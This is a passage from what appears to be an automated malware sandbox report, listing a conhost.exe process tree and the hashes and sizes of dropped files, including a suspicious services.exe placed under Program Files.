      Command: C:\Windows\System32\conhost.exe
      - [4] C:\Windows\System32\conhost.exe
        Command: "C:\Windows\System32\conhost.exe" "jgimrcmwq"
Downloads

C:\Program Files\Windows\services.exe
- Filesize: 5.3MB
- MD5: 52fdd7f3ed1b50bc5794983a37cb4064
- SHA1: 4a185751e9e94dccb3330ca79f893de7ca080482
- SHA256: e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2
- SHA512: 4f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
- Filesize: 539B
- MD5: 84f2160705ac9a032c002f966498ef74
- SHA1: e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
- SHA256: 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
- SHA512: f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57